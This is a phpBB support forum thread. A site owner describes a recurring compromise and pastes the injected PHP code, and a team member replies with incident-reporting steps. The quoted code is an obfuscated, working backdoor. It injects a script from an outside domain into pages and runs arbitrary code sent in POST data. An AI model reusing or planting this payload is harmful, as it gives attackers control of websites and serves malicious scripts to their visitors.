Problem with a spam script

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Suggested Hosts
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
thor_666
Registered User
Posts: 6
Joined: Fri Jul 27, 2007 7:35 am

Problem with a spam script

Post by thor_666 »

Hello, i will try to explain my problem. Some days ago i get a worm or Trojan on my pc that when i'm upgrade the phpbb forum to last upgrade it up to my site and disconfigured all the forum writting php code on the pages so the page loading will too long and google put my site on a black list.

After that, i clean my pc with various clean tools and erase all the site when i have vorum located and put phpbb clean installation with a copy of the BD, At start all go fine but on next day the script is there again.

I try to put a new phpbb installation with a new clean bd and after some days the forum go fine without any script. but as soon as i change the config.php the scripts come back.

AS i'm sure that my computer is clean i have the suspicious that in some way the script get saved on the BD. I clean all the phpbb_style_template, sessions and other tables that are mainly cache but the scirpt is still going back to my site. The script is edition-Akanthus.de and the php that is change on my files is this

Code: Select all

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndGZ2Jykpe2Z1bmN0aW9uIHRmdigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyVmthWFJwYjI0dFlXdGhiblJvZFhNdVpHVXZjRzl6ZEdWeUwzTXlaSE5sY25acFkyVXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdGZ2MigkYSwkYiwkYywkZCl7Z2xvYmFsJHRmdjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHRmdjEpKWNhbGxfdXNlcl9mdW5jKCR0ZnYxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd0ZnYnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd0ZnYnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdGZ2bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndGZ2MicpKSE9J3RmdjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
As i don't want to lost all information over my forum, thing i will have to do if put a clean BD and i'm really don't know wher more to search if anyone have any idea any help will be very apreciatted.

Thanks and sorry if my english is no so good.
Pit$Bull
Former Team Member
Posts: 23099
Joined: Sat Dec 02, 2006 4:08 pm
Name: Can't Remember

Re: Problem with a spam script

Post by Pit$Bull »

If you board has been hacked, please do the following before making any modifications to your board (this includes changing passwords, editing files, running the support toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
Locked

Return to “[3.0.x] Support Forum”